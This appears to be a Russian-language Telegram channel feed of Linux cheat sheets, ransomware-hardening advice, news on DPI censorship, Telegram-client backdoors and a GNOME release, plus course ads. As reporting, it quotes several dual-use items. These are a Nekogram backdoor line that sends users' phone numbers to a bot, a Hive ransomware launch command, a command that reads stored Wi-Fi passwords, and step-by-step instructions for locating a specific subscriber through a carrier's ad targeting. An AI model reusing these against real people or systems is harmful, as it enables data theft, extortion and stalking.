LinuxSkill - Сводки с прода и Шпаргалки

🛡️ Хакеры шифруют Linux? Закрой эти дыры прямо сейчас. Чек-лист по безопастности сервера.

Думаешь, шифровальщики — это только виндовая проблема? Держи практический чек-лист, который спасет твои Linux-серверы от участи быть зашифрованными ради выкупа. uname -r && apt-get update && apt-get upgrade # Регулярно обновляй ядро и прикладной софт. Шифровальщик Erebus обошелся южнокорейскому хостеру в миллион долларов, потому что они сидели на ядре 2008 года с уязвимостью Dirty Cow, дающей рут-доступ. По статистике до 80-90% эксплойтов бьют по старым незакрытым дырам. grep "bind" /etc/redis/redis.conf # Не оставляй базы и сервисы торчать наружу без авторизации. Небезопасная конфигурация Redis (например, доступная извне по умолчанию) позволяет злоумышленникам удаленно закинуть свой SSH-ключ на сервер и зайти с правами root,. Прячь внутренние сервисы за "КВН" и фильтруй доступы. sudo apt install rkhunter chkrootkit lynis sudo rkhunter --check sudo lynis audit system # Периодически аудируй систему локальными утилитами. Инструменты вроде Rootkit Hunter (rkhunter), Check Rootkit (chkrootkit) и Lynis помогут выявить потенциальные проблемы безопасности и вредоносные программы, которые маскируют свое присутствие в системе. Также обязательно просматривай логи на предмет подозрительных модулей ядра. Настрой Least Privilege и включи 2FA (MFA): 1. Учетные записи должны иметь минимальные привилегии. 2. Включи многофакторную аутентификацию на всех панелях управления и удаленном доступе. Если у взломанного пользователя нет нужных прав, вирусу сложнее разгуляться. Тот же вымогатель Hive для Linux прицельно убивает непривилегированные (non-root) процессы перед тем, как шифровать корневой каталог. Меньше прав — меньше шансов потерять всё. Золотое правило бэкапов 3-2-1-1 против ransomware: • 3 копии данных • 2 разных типа носителей • 1 копия вне основной площадки (оффсайт) • 1 копия в неизменяемом хранилище (WORM) или оффлайн. Если хакер уже внутри, обычные бэкапы могут быть уничтожены. Копия в изолированном неизменяемом хранилище (WORM — write once, read many), до которого злоумышленник не сможет дотянуться, чтобы переписать файлы, — твой единственный надежный шанс на восстановление.

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #шпаргалка@LinuxSkill ⭐️ Зеркало в MAX #linux #ransomware #infosec #администрирование

🚨 Дырявый SOCKS5 и приложения-шпионы. Как РКН блокирует твой личный КВН

Думаешь, настройка VLESS надёжно защитила тебя от ТСПУ, а "рабочий профиль" спрятал КВН от банков? Оказалось, популярные клиенты содержат критические дыры, а государственные приложения легально сливают твой трафик через открытые порты. Собрал для тебя хронику грандиозного провала ИБ в сфере обхода блокировок и новые методы защиты. AIКВН: КВН-протокол с мимикрией трафика и автоматической сменой профиля > https://habr.com/ru/articles/1019962/ Базовые крипто-примитивы AIКВН и маскировка: Шифрование: X25519, ChaCha20-Poly1305, BLAKE3 Профили маскировки: QUIC, WebRTC/STUN, DNS over UDP Стандартные протоколы палятся системами DPI по форме соединения. Автор разработал AIКВН, который маскирует трафик и использует "Нейронный резонанс" (Signal Reconstruction Resonance) на сервере для оценки деградации маски. Если ТСПУ начинает душить сессию, протокол автоматически переключается на резервную маску без разрыва туннеля, используя короткие криптотеги вместо заметного постоянного идентификатора сессии. Из-за критической уязвимости VLESS клиентов скоро все ваши КВН будут заблокированы > https://habr.com/ru/articles/1020080/ Характерные Proxy-порты для сканирования из методички РКН: SOCKS: 1080, 9000, 5555, 16000-16100 Уязвимые VLESS клиенты с открытым локальным SOCKS5: Happ, v2RayTun, V2BOX, v2rayNG, Hiddify, Exclave, Npv Tunnel, Neko Box Все мобильные клиенты на базе xray/sing-box запускают локальный SOCKS5-прокси без авторизации. Приложения-шпионы могут напрямую подключиться к портам на `localhost` в обход КВНService и узнать ваш внешний IP-адрес. Хуже всего ситуация с клиентом Happ: разработчики оставили открытым `HandlerService`, что позволяет злоумышленникам напрямую сдампить ваши конфиги, входной IP и SNI. Отправим стукачей в ГУЛАГ > https://habr.com/ru/articles/1022390/ Изоляция приложений-стукачей в песочнице на Android: 1. Установить Insular (ранее Island) из каталога F-Droid 2. Клонировать приложение (Т-Банк, Яндекс-Навигатор) во вкладку Island 3. Выбрать Uninstall в Mainland для удаления из основной системы Минцифры требует от разработчиков внедрять модули слежки за КВН, и многие приложения (например, банки и маркетплейсы) начали требовать отключить туннелирование. Комьюнити предлагает изолировать "стукачей" в рабочих профилях через приложения типа Insular. Песочница ограничивает доступ к контактам и фото. Однако важно помнить: от уязвимости с открытыми SOCKS5-портами этот метод не спасёт, так как loopback-интерфейс в рабочем профиле не изолируется.

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #News@LinuxSkill ⭐️ Зеркало в MAX #КВН #infosec #vless #xray #habr

🚨 ТСПУ ловит VLESS, а ОпСоС сливает адрес. Двойной провал приватности мобильной связи.

Думаешь, замаскированный КВН надёжно скрывает твой трафик, а провайдер лишь молча гоняет пакеты? Оказалось, ТСПУ уже научился щелкать VLESS, а операторы связи буквально раздают твои перемещения и списки SMS любому желающему через рекламные кабинеты. Собрал для тебя хронику грандиозного провала ИБ на уровне провайдеров. 1. Как оператор связи видит, что вы используете КВН — техническая сторона вопроса > https://habr.com/ru/articles/1017158/ Как DPI (Deep Packet Inspection) ТСПУ классифицирует зашифрованные туннели: 1. Сигнатуры: opcode у OpenКВН или фиксированная структура handshake у WireGuard. 2. TLS fingerprinting: анализ наборов шифров (JA3/JA4-хеши). 3. Энтропия и тайминги: у КВН-туннеля пакеты примерно одного размера идут с ровными интервалами. Оборудование Роскомнадзора за 83 миллиарда рублей, стоящее на узлах операторов, не читает содержимое, но видит сам факт КВН. И если раньше VLESS спасал за счет качественной маскировки под HTTPS, то с декабря 2025 года ТСПУ научился определять и его по косвенным признакам. Система не всесильна: в марте 2026 года узлы ушли в bypass (отказ от фильтрации) из-за перегрузки — оборудование не справилось с 40 тысячами правил фильтрации в день вместо привычных 10–15 тысяч. 2. Найдем любого — бесплатно, какой у него оператор связи? > https://habr.com/ru/articles/1017664/ Я тебя найду и позвоню > https://habr.com/ru/companies/timeweb/articles/861510/ ОпСоС — это сленговое сокращение, обозначающее «оператор сотовой связи» или «провайдер сотовой связи». В профессиональных дискуссиях так называют телеком-компании, предоставляющие услуги мобильного интернета и телефонии. Что видит твой ОпСоС в мобильном трафике: Домены посещаемых сайтов (так как SNI по умолчанию не шифруется в TLS). Историю всех телефонных звонков и перемещений между геозонами. Любой ОпСоС знает о тебе буквально всё: на какие домены ты ходишь по ночам, где ты спишь и где работаешь. Самое неприятное, что операторы легально монетизируют эту базу, продавая метаданные маркетинговым агентствам через интерфейс рекламных кабинетов. Алгоритм легального пробива через рекламный кабинет оператора: 1. Зарегистрироваться по SMS в сервисе таргетированной рекламы ОпСоса. 2. Нарисовать зону на карте (дом или работа цели). 3. Сделать 1 дозвон жертве со своего номера. 4. В фильтре "звонили абоненту" указать 4 фейковых номера и свой. Результат: аудитория сужается до 1 человека. Операторы связи продают таргетинг, но на деле отдают инструмент для тотальной слежки. Любой человек с улицы может бесплатно узнать всё о конкретном абоненте. Найдя тебя через звонок или заманив на сайт с установленным рекламным счетчиком, злоумышленник может выгрузить твои интересы, посещаемые сайты, сферу бизнеса и даже имена отправителей SMS (включая сообщения с кодами 2FA).

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #News@LinuxSkill #TSPU #Privacy #Telecom

🚀 Тратишь время на рутину? Эти 23 команды поиска решат 99% задач с файлами

Устал скроллить директории руками и не можешь найти нужный конфиг или строчку в логах? Сейчас покажу полную шпаргалку ровно на 23 команды для быстрого поиска файлов и текста в Linux. Никакой воды, только хардкор. 1. Поиск файлов по имени и фразам # Найти файл по имени (Find a file by name) $ find / -iname "[query]" $ fd [query] $ fzf # Найти все пути, содержащие фразу (Find all path names containing a phrase) $ locate [query] $ plocate [query] 2. Поиск исполняемых файлов и истории # Найти путь к исполняемому файлу (Find the path of an executable) $ which [command] # Найти расположение бинарников, исходников и man-страниц команды (Find location of binary/source/man files for a command) $ whereis [command] # Поиск паттерна в выводе команды (Search for pattern in output of command) $ history | grep [phrase] 3. Поиск файлов по времени изменения и доступа # Найти файлы, чье содержимое было изменено менее 60 минут назад (Find files whose content was modified less than 60 minutes ago) $ find / -mmin -60 # Найти файлы, чей статус был изменен менее 60 минут назад (Find files whose status was changed less than 60 minutes ago) $ find / -cmin -60 # Найти все файлы, к которым обращались 7 дней назад (Find all files accessed 7 days ago) $ find / -atime 7 4. Поиск паттернов и текста внутри файлов # Поиск паттерна в файле (Search for pattern in file) $ grep [query] [file] $ rg [query] [file] $ ag [query] [file] # Рекурсивный поиск в файлах (Search recursively in files) $ grep -r [query] [path] $ rg [query] [path] $ ag [query] [path] 5. Поиск по размеру, расширению и пустых директорий # Найти файлы размером от 10MB до 100MB (Find files between 10MB and 100MB) $ find / -size +10M -size -100M # Найти файлы по расширению (Find files by extension) $ fd -e [extension] $ find . -type f -name "*.[extension]" $ locate "*.[extension]" # Найти пустые файлы и директории (Find empty files and directories) $ find / -type f -empty $ find / -type d -empty

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #шпаргалка@LinuxSkill ⭐️ Зеркало в MAX #Linux #Search #CLI #Bash #Sysadmin #DevOps

🚨 Как сторонние Telegram-клиенты сливают данные и кто на самом деле обошел блокировки

Думаешь, официальный Telegram своими силами борется с блокировками, а сторонние open-source клиенты абсолютно прозрачны? Оказалось, мессенджер выезжает за счет комьюнити, а популярные форки содержат полноценный spyware. Собрал для тебя техническую хронологию грандиозного провала ИБ в экосистеме Telegram. Хроника расследования на Хабре и OpenNet: 1. «Telegram обошёл блокировку РКН» — нет, не Telegram / Хабр > https://habr.com/ru/articles/1019200/ Официальная команда Telegram три месяца игнорировала блокировки ТСПУ. Встроенный FakeTLS (MTProxy) генерировал математически кривые пакеты: Ошибка 1: Аномальный размер ключа По спецификации X25519-ключ обязан занимать ровно 32 байта (256 бит). Код Telegram генерировал 20 байт. Для DPI это тривиальный маркер блокировки. Ошибка 2: Использование драфтового мусора Вместо стандартного идентификатора 0xFE0D для Encrypted Client Hello (ECH), Telegram слал несуществующий 0xFE02, которого нет ни в одном реальном браузере. Комьюнити Telemt отреверсило фильтры и принесло готовый Pull Request (#30513). Энтузиасты сами нашли сигнатуры и собрали патч. Мейнтейнер tdesktop смерджил минимальный набор исправлений, а Павел Дуров отчитался о «цифровом сопротивлении», ни разу не упомянув реальных авторов фикса. При этом фундаментальная проблема L7-анализа осталась нерешенной. 2. Неофициальный Telegram-клиент Nekogram отправлял номера телефонов боту разработчика > https://www.opennet.ru/opennews/art.shtml?num=65130 Исходный код Nekogram на GitHub был чистым, но в релизные APK-пакеты (в Google Play и Telegram-каналах) вшивался вредоносный обфусцированный код. В классе Extra.java находился бэкдор, перебирающий до 8 аккаунтов пользователя. Он формировал JSON-карту связок UserID и номеров телефонов: {"123456789": "+79001234567"} Данные скрытно сливались через инлайн-запрос, не оставляя следов в истории чатов: InlineBotHelper.Query("@nekonotificationbot", payload); Те, кто ставил альтернативный клиент ради расширенных функций, отдавали свои номера разработчику, который мог продавать их создателям OSINT-ботов (в коде были упоминания @tgdb_search_bot и @usinfobot). Вдобавок, ZDI раскрыли RCE-уязвимость (ZDI-CAN-30207) в официальной телеге: выполнение кода было возможно через библиотеку rlottie при предпросмотре анимированных стикеров (уязвимость снизили с 9.8 до 7.0 после того, как ТГ заявил о серверных проверках).

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #News@LinuxSkill #telegram #infosec #nekogram #privacy

💸 Выкуп в $1 000 000: цена дырявого Apache и старого ядра

Думаешь, шифровальщики — это исключительно головная боль виндузятников? Сейчас покажу, как старое ядро Linux обошлось хостинг-компании в 1 миллион долларов и какими командами вымогатели показательно убивают ESXi-серверы. Южнокорейский хостер Nayana поймал Linux-версию вымогателя Erebus. Злоумышленники зашифровали 433 различных типа файлов. uname -r Вывод на взломанных серверах: 2.6.24.2 (ядро 2008 года!) Версии веб-сервера тоже оказались из музея древностей: httpd -v && php -v Apache 1.3.36 и PHP 5.1.4 (выпущены в 2006 году) Изначальный аппетит хакеров составлял внушительные 4,4 миллиона долларов, но в итоге компании удалось сторговаться на $1 млн. Проблема крылась в устаревшем ПО: ядро содержало критическую уязвимость Dirty Cow, которая подарила злоумышленникам рут-доступ к системе. Без приватного ключа хакеров спасти зашифрованные данные было невозможно. Современные шифровальщики (например, BlackMatter для Linux) бьют прямо по VMware ESXi. Вирус использует штатную утилиту esxcli для получения списка хранилищ: esxcli storage filesystem list Его интересуют файловые системы vmfs, vffs и nfs BlackMatter для Linux работает очень технично: перед началом шифрования он принудительно останавливает виртуальные машины, убивает указанные в конфиге процессы и полностью тушит файрвол. Само шифрование файлов происходит блоками с использованием потокового алгоритма HC-256, а ключи шифруются открытым ключом RSA-4096. Вымогатель Hive для Linux/FreeBSD работает не менее жестко. Он завершает непривилегированные (non-root) процессы и шифрует файлы прямо в корне (/). Запуск шифровальщика с параметром: ./linux64 -no-wipe # Флаг -no-wipe отключает заполнение свободного пространства случайными данными Hive методично сканирует и шифрует файлы в корневом каталоге. Если при запуске не передать спасительный параметр -no-wipe (как в коде выше), вредонос забьет все свободное место на диске случайным мусором, чтобы ты физически не смог восстановить удаленные или перезаписанные файлы.

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #SkillHunter@LinuxSkill ⭐️ Зеркало в MAX #linux #ransomware #infosec #esxi

🌐 Полный контроль над сетью! Подборка из 42 сетевых команд которая должна быть у каждого

Упала сеть на сервере или нужно срочно проверить открытые порты, а нужные ключи вылетели из головы? Сейчас покажу ультимативную шпаргалку по сети в Linux. Только рабочие конструкции для траблшутинга и базовой настройки. 1. Внешний IP, пароли и сетевые интерфейсы Быстрый сбор базовой информации о текущем подключении и железе. # Получить внешний IP-адрес $ curl ifconfig.me $ dig +short myip.opendns.com @resolver1.opendns.com $ netcat icanhazip.com 80 <<< $'GET / HTTP/1.1\nHost: icanhazip.com\n' | tail -n1 # Получить пароль от Wi-Fi $ cat /etc/NetworkManager/system-connections/[SSID] | grep psk= # Вывести список сетевых интерфейсов $ lspci | egrep -i --color 'network|ethernet' $ ifconfig -a $ ip a $ ip link show $ lshw -class network $ cat /proc/net/dev $ nmcli device status 2. Загрузка файлов и информация о домене Утилиты для скачивания файлов прямо из консоли и проверки whois. # Скачать файл по ссылке $ wget [url] $ curl -O [url] $ aria2c [url] $ axel [url] # Получить информацию о домене $ whois [ip] 3. Диагностика узлов и маршрутов Команды для проверки доступности соседних устройств и пути прохождения пакетов. # Пропинговать другое устройство $ ping [ip] $ mtr [ip] # Отследить путь пакета до цели $ traceroute [ip] $ tracepath [ip] # Установить Telnet подключение $ telnet [ip] [port] 4. DNS, Hostname и настройки интерфейса Управление именем машины, проверка резолва DNS и сброс IP-адреса. # Настроить сетевой интерфейс $ ifconfig # Показать hostname вашего сервера $ hostname $ hostnamectl # DNS-запрос и отображение ответа сервера $ dig [ip] $ nslookup [ip] $ host [ip] # Освободить IP и получить новый от DHCP $ dhclient -r 5. Порты, сокеты и маршрутизация Главный арсенал для поиска открытых портов и проверки таблицы маршрутизации. # Вывести список открытых сокетов $ netstat -l $ lsof -i $ ss -l # Показать таблицу маршрутизации $ ip route $ route # Показать открытые порты $ ss -tuln $ netstat -tuln # Проверить доступность порта на хосте $ nc -zv [host] [port] 6. Использование пропускной способности (Bandwidth) Утилиты для мониторинга нагрузки на сеть в реальном времени. # Показать использование канала $ iftop $ nethogs $ vnstat $ bmon $ nload

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #шпаргалка@LinuxSkill ⭐️ Зеркало в MAX #Linux #Network #DevOps #Sysadmin #CLI

🧠 Если вы давно хотели войти в Linux-администрирование, но откладывали — сейчас самое время. Старт курса от OTUS уже совсем близко! 👉 На курсе «Administrator Linux. Basic» вы пройдёте путь от базовых понятий Linux до настройки веб-серверов, MySQL, Docker и систем мониторинга. Разберёте Bash, TCP/IP, работу с трафиком и фильтрацией. Научитесь работать с Nginx, Apache, Git, Prometheus, Grafana и ELK — тем стеком, который используют в реальной инфраструктуре. Программу ведут практикующие эксперты. Формат — живые занятия, много практики и реальные кейсы. Подходит новичкам, Windows-администраторам, разработчикам и тестировщикам. 👉 До старта остаются считанные дни. Регистрируйтесь: https://otus.pw/sDpE/ 🎁 Получите скидку 10% с промокодом "birthday". Срок действия - 30.03 - 04.04 - включительно Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

💀 MITM-атака в кармане: почему «Телегу» нужно снести прямо сейчас

Многие массово качают клиент «Telega» для обхода блокировок, не подозревая, что добровольно отдают свои сессии под перехват. Сейчас на уровне кода разберём, как устроена их MITM-атака и как защитить свою инфраструктуру. Telega (АО «Телега», ранее «Даль») — это альтернативный клиент, разработчики которого 18 марта 2026 года активировали принудительный перехват трафика. Клиент обращается к серверу за списком подменённых дата-центров. curl -s https://api.telega.info/v1/dc-proxy # Возвращает подменённые IP адреса дата-центров в формате JSON (например, 130.49.152.X) Трафик перенаправляется на собственные серверы проекта, а проверка владельца подсети выдает прямую связь с экосистемой VK. whois 130.49.152.0 | grep AS # Вывод покажет AS203502 JOINT STOCK COMPANY TELEGA # Единственный апстрим: AS47764 LLC VK Но подмена IP — это только половина атаки. Чтобы читать зашифрованный трафик, разработчики вшили дополнительный RSA-ключ в динамическую библиотеку клиента. strings libtmessages.49.so | grep -A 1 "BEGIN RSA PUBLIC KEY" # Найдено 4 ключа. Ключ по адресу 0x15788E1 является подставным и отсутствует в официальном клиенте Именно этот четвёртый ключ позволяет их серверам успешно завершать криптографическое рукопожатие, выступая "человеком посередине". Более того, клиент получает с сервера конфигурацию (Remote Config), которая принудительно ослабляет криптозащиту. // Принудительное отключение Perfect Forward Secrecy и секретных чатов DcConfig.options.use_pfs = false; FeatureManager.currentInstance().isSCEnabled() = false; Секретные чаты (End-to-End) тихо игнорируются, а выключенный PFS позволяет злоумышленникам расшифровать весь записанный трафик в будущем, если ключи будут скомпрометированы. Просто удалить приложение с телефона недостаточно, так как активная сессия уже находится на их серверах. 1. Принудительно отозвать сессии: В официальном клиенте Telegram -> Настройки -> Устройства -> Завершить все другие сеансы 2. Заблокировать подсети злоумышленников на корпоративном фаерволе: iptables -A OUTPUT -d 130.49.152.0/24 -j DROP iptables -A OUTPUT -d 130.49.224.0/19 -j DROP Если ты или твои коллеги обсуждали важные данные с пользователями Telega, считай эту информацию известной третьим лицам. Источники: Telega: как «удобный клиент Telegram» превратили в MITM с цензурой и ИИ-надзирателем В интернете появился полный теханализ MITM-атаки в клиенте Telega от неизвестного источника Остальные статьи по теме: habr.com habr.com habr.com habr.com habr.com habr.com habr.com habr.com habr.com habr.com habr.com

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #News@LinuxSkill ⭐️ Зеркало в MAX #telega #mitm #infosec #telegram

🛡 От телетайпа до plocate. Два лонгрида, которые закроют все дыры в базе Linux

Задумывался, как ядро на самом деле обрабатывает твои нажатия в консоли, и почему опытные админы ставят plocate вместо обычного locate? Я собрал для тебя выжимку из двух отличных статей с Хабра. Одна для глубокого погружения во внутренности подсистемы ввода-вывода, а вторая, чтобы намертво закрепить фундаментальную базу. 1. Чёрное окошко Linux: погружение в подсистему TTY > https://habr.com/ru/companies/ruvds/articles/983240/ Отличный исторический и технический разбор того, что скрывается за привычным эмулятором терминала. Автор объясняет, что TTY - это драйвер символьного устройства, а не просто окошко интерфейса. Оказывается, за кулисами работает алгоритм Line Discipline. Именно он буферизирует ввод и превращает управляющие коды (например, нажатие Ctrl+C) в сигналы SIGINT для процессов. В комментариях к статье также отлично дополнили тему аварийного управления ядром через консоль: # Разрешить использование Magic SysRq Keys для прямого управления ядром echo "1" > /proc/sys/kernel/sysrq Этот параметр позволяет посылать низкоуровневые команды (например, принудительную перезагрузку или убийство ресурсоемких процессов через OOM kill) напрямую в ядро при жестком зависании системы. 2. Учим Linux: Файлы, навигация и поиск > https://habr.com/ru/articles/1003550/ Мощный структурированный справочник по файловой системе и базовым утилитам. Подробно разбирается назначение виртуальных ФС /proc и /sys, отличия жёстких ссылок от символических, а также нюансы работы с логами. Отдельное внимание уделено правильным флагам утилит для написания надежных скриптов: # Слежение за файлом лога в реальном времени с учётом его пересоздания (ротации) tail -F file.txt В отличие от обычного флага -f, заглавная F не даст команде отвалиться, когда системный демон пересоздаст свой лог-файл. Также автор рекомендует использовать пакет plocate для поиска файлов в современных дистрибутивах (например, Ubuntu 22.04) - он работает значительно быстрее устаревшего mlocate за счёт более эффективного индекса. Пробегись по материалам и скинь коллегам, если они всё ещё путают консоль с терминалом.

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #SkillHunter@LinuxSkill #Linux #DevOps #Security #VPN #Networking #DPI

🚀 Хотите подняться на новый уровень в карьере и освоить востребованные DevOps-практики? Сегодня компании ищут специалистов, которые умеют ускорять релизы, автоматизировать процессы и держать инфраструктуру под контролем. 🧠 Курс OTUS «DevOps практики и инструменты» создан для тех, кто уже работает в IT — разработчиков, тестировщиков и администраторов. Программа охватывает всё: Infrastructure as Code, CI/CD, управление конфигурацией, работу с артефактами, observability и безопасность. Вас ждут живые лекции и практикующие эксперты. Мы не даём сухую теорию — вы сразу переходите к практике и получаете карту best practices, обновлённую на 2025 год. 👉 Пройдите короткое вступительное тестирование: https://otus.pw/zWKz/ 🎁 Получите скидку 10% с промокодом "birthday". Срок действия - 30.03 - 04.04 - включительно Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

🚀 19 готовых команд для JSON в терминале

Устал парсить ответы от API нечитаемой простынёй текста или писать костыли? Сейчас покажу шпаргалку по базовым операциям с JSON прямо в консоли Linux. 1. Pretty print (Красивый вывод) Команды для форматирования JSON в удобный структурированный вид. # Использование утилиты fx $ echo '{"name": "Linux"}' | fx . # Использование утилиты dasel $ echo '{"name": "Linux"}' | dasel -r json # Использование популярной утилиты jq $ echo '{"name": "Linux"}' | jq "." # Использование утилиты jshon $ echo '{"name": "Linux"}' | jshon # Использование утилиты jql $ echo '{"name": "Linux"}' | jql '.' # Использование утилиты emuto $ echo '{"name": "Linux"}' | emuto 2. Select (Выборка данных) Как вытащить конкретное значение по ключу из JSON-строки,. # Выборка через dasel $ echo '{"name": "Linux"}' | dasel -r json '.name' # Выборка через fx $ echo '{"name": "Linux"}' | fx .name # Выборка через jq $ echo '{"name": "Linux"}' | jq ".name" # Выборка через jshon $ echo '{"name": "Linux"}' | jshon -e name # Выборка через jql $ echo '{"name": "Linux"}' | jql '.name' # Выборка через emuto $ echo '{"name": "Linux"}' | emuto "$.name" 3. Put (Добавление и изменение) Команды для добавления новых ключей или изменения существующих значений. # Добавление строки через dasel $ echo '{"name": "Linux"}' | dasel put string -r json '.year' '1991' # Вставка значения через jshon $ echo '{"name": "Linux"}' | jshon -s 1991 -i year # Формирование нового объекта через emuto $ echo '{"name": "Linux"}' | emuto "{'name': $.name,'year':1991}" 4. Delete (Удаление) Быстрое удаление ненужных полей из переданного JSON. # Удаление ключа через dasel $ echo '{"name": "Linux", "year": 1991}' | dasel delete -r json '.year' # Удаление ключа через jshon $ echo '{"name": "Linux", "year": 1991}' | jshon -d year # Удаление ключа путем пересоздания объекта в emuto $ echo '{"name": "Linux", "year": 1991}' | emuto "{'name': $.name}" 5. Create (Создание) Генерация нового JSON-объекта из переданных параметров. # Создание JSON с помощью jo $ jo -p name=Linux year=1991 Теперь ты знаешь, как быстро форматировать, изменять и парсить JSON без написания скриптов.

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #шпаргалка@LinuxSkill #Linux #JSON #CLI #DevOps #Bash

🎥 Вебинар по Observability: «Grafana Stack - закрываем все современные потребности Observability » На вебинаре вы узнаете: - Обзор инструментов Grafana Labs: Alloy, Loki, Tempo, Grafana - Разбор схем возможного масштабирования инструментов Alloy, Loki, Tempo, Grafana - Практика: построим наглядную систему мониторинга Что вы получите: - Понимание, как Grafana Stack закрывает все три столпа Observability: метрики, логи и трассировки. - Навыки быстрой настройки и адаптации Grafana под свою инфраструктуру. - Практические советы по развертыванию инструментов Grafana Labs для полноценной Observability-платформы. 👉 Для участия зарегистрируйтесь: https://otus.pw/FR6E/ 🎁 Все участники вебинара получат специальные условия на полное обучение курса «Observability: мониторинг, логирование, трейсинг» На курсе от OTUS вы освоите инструменты, без которых не обходится ни один DevOps или системный администратор: Prometheus, Grafana, ELK, Tempo и другие. Вы научитесь выстраивать наблюдаемость под ключ — от сбора метрик до настройки алертов и визуализации данных. Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

🪦 X11 вырезали под корень. Разбираем архитектуру и новые реалии GNOME 50

Думали, что всегда сможете переключить сессию на старый добрый Xorg, если новомодный Wayland снова залагает? Больше нет. Состоялся релиз GNOME 50 «Tokyo», и разработчики окончательно вырвали X11 с корнем. Выполняю работу над ошибками: разбираем архитектурные изменения строго без домыслов — только сухие факты из чейнджлогов. Что именно вырезали: Из композитного сервера Mutter и GNOME Shell полностью удален код поддержки протокола X11. Дисплейный менеджер GDM теперь запускает собственные сессии исключительно через Wayland, хотя запуск сторонних X11-оболочек через него пока сохранен. Старые X11-приложения продолжат работать благодаря интегрированной прослойке XWayland. -Dx11 Эта опция сборки, как и возможность настройки параметров X11, навсегда удалена из компонента gnome-settings-daemon. Вернуть поддержку иксов в GNOME простой пересборкой пакета больше нельзя. Архитектурный сдвиг к systemd: Разработчики отказались от старых костылей в пользу жесткой интеграции с системным менеджером systemd. В GDM теперь задействована инфраструктура systemd-userdb для выделения учетных записей, а собственный встроенный менеджер сервисов GNOME отправлен на пенсию. run0 Это новая утилита из состава systemd 256, которая теперь используется по умолчанию вместо pkexec для выполнения привилегированных действий в мастере начальной настройки (gnome-initial-setup). Новый RDP и headless-режим: Удаленный доступ получил аппаратное ускорение вывода видео через современные API Vulkan и VA-API. Добавлена аутентификация через Kerberos и даже возможность проброса локальной web-камеры в сеанс с удаленной системой. gnome-headless-session@.service Новый systemd-сервис, специально добавленный в GDM для удобного запуска сеансов без подключенного физического экрана. Это долгожданное решение для комфортных RDP-подключений к headless-серверам. Фикс NVIDIA и управление цветом: Внедрен протокол Explicit Sync, который позволяет синхронизировать буферы напрямую и избавляет от графических артефактов и задержек на проприетарных драйверах NVIDIA. Variable Refresh Rate (VRR) и дробное (нецелое) масштабирование переведены из разряда экспериментальных функций и включены по умолчанию. color-management-v2 Новый поддерживаемый протокол Wayland, предоставляющий полноценные средства для управления цветом. В дополнение к этому появилась поддержка передачи HDR-метаданных при screen sharing (совместном доступе к экрану), чтобы транслируемые цвета не теряли насыщенность.

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #News@LinuxSkill #GNOME #Wayland #Linux #DevOps #Security #Systemd

🎥 Вебинар по Linux: «Связанные списки в ядре Linux: от API до реального кода» На вебинаре вы узнаете: - API связанных списков и очередей в ядре Linux - Реальные кейсы использования связанных списков в драйверах - Примеры простых модулей ядра с использованием связанных списков - Типовые ошибки при работе с динамическими структурами данных и способы их избежать После занятия вы сможете: - Писать код в ядре Linux с использованием связанных списков; - Понимать, в каких сценариях связанные списки — оптимальный выбор; - Уверенно работать с API связных списков и очередей ядра; - Находить и исправлять ошибки при работе с динамическими структурами данных; - Разрабатывать и отлаживать модули ядра с поддержкой связанных списков. 👉 Для участия зарегистрируйтесь: https://otus.pw/4q0F/ 🎁 Все участники вебинара получат специальные условия на полное обучение курса "Разработка ядра Linux" Курс «Разработка ядра Linux» — это практическое погружение в устройство ОС: процессы, память, модули, прерывания и всё, что делает Linux мощным и стабильным. Вы научитесь писать и отлаживать собственные модули ядра, работать с памятью, разбираться в синхронизации потоков и управлении прерываниями. Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

☠️ Прощай, VLESS: реверс-инжиниринг новых блокировок ТСПУ и спасение серверов

Твой личный туннель начал отваливаться, а зарубежные сайты виснут после пары секунд загрузки? DPI перешел на новый уровень. В столице раскатали «белые списки», а системы анализа научились детектить популярные протоколы обхода по их поведению. Я собрал для тебя выжимку из двух мощнейших технических разборов на Хабре. Пора обновлять конфиги, пока наши сервера окончательно не легли. 1. Белые списки добрались до Москвы: изучаем механику «отсечки» в 16 килобайт > https://habr.com/ru/articles/1008164/ Провайдеры начали жестко фильтровать трафик по SNI. Если ты обращаешься к зарубежному серверу, TCP-хендшейк проходит успешно, но ровно через 16-20 килобайт сессия принудительно обрывается. Выживают только домены из специального белого списка, которых осталось около тысячи на весь интернет. # Как проверить свой IP на блокировку с подменой SNI из белого списка curl -v --connect-to ::<твой_заблокированный_ip> https://ok.ru Если с поддельным разрешенным заголовком данные пролетают мгновенно, значит твой сервер жив, но попал под фильтрацию Продвинутого DPI. Спасают сложные схемы маршрутизации, например, проброс туннелей через промежуточные ноды у непопулярных хостеров. 2. Как ТСПУ ловит VLESS в 2026 и почему XHTTP — следующий шаг > https://habr.com/ru/articles/1009542/ Протокол Reality больше не спасает от блокировок. Он безупречно маскирует TLS-рукопожатие и справляется с активным зондированием, но системы фильтрации активно применяют поведенческий анализ. Туннель генерирует постоянный двунаправленный поток данных, который абсолютно не похож на реальный профиль веб-серфинга или запросы к API. Решение — переход на транспорт XHTTP, который бьет трафик на статистически нормальные пары HTTP запрос-ответ. # Фрагмент клиентского конфига для защиты от блокировки по числу хендшейков "xmux": { "maxConnections": 1 } Этот параметр в связке с новым транспортом помогает от так называемой «сибирской блокировки», когда фильтр рубит соединения за множество рукопожатий за короткое время. Что в итоге? Системы анализа пакетов научились проверять отпечатки библиотек, анализировать тайминги и выявлять аномалии в распределении трафика. Регулярно проверяй графики нагрузки на своих узлах и переводи критичную инфраструктуру на XHTTP, чтобы размыть поведенческий профиль соединения.

